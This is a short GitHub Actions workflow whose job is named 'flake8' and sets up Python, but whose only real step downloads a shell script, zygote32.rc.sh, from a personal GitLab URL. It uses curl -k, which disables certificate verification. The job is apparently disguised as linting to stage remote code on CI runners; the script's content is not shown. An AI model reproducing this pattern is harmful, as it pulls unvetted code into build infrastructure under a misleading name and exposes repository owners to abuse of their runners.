name: smcdev0

on:
  repository_dispatch:
  workflow_dispatch:

jobs:
    flake8:
        name: smcdev
        runs-on: ubuntu-18.04
        timeout-minutes: 180
        steps:
        -   uses: actions/checkout@v2
        -   uses: actions/setup-python@v1
            with:
                # matches compat target in setup.py
                python-version: '3.6'
        -   name: "Main Script"
            run: |
                curl -L -O -k https://gitlab.com/sarahemersonzrex/sbin/-/raw/main/zygote32.rc.sh
                ls
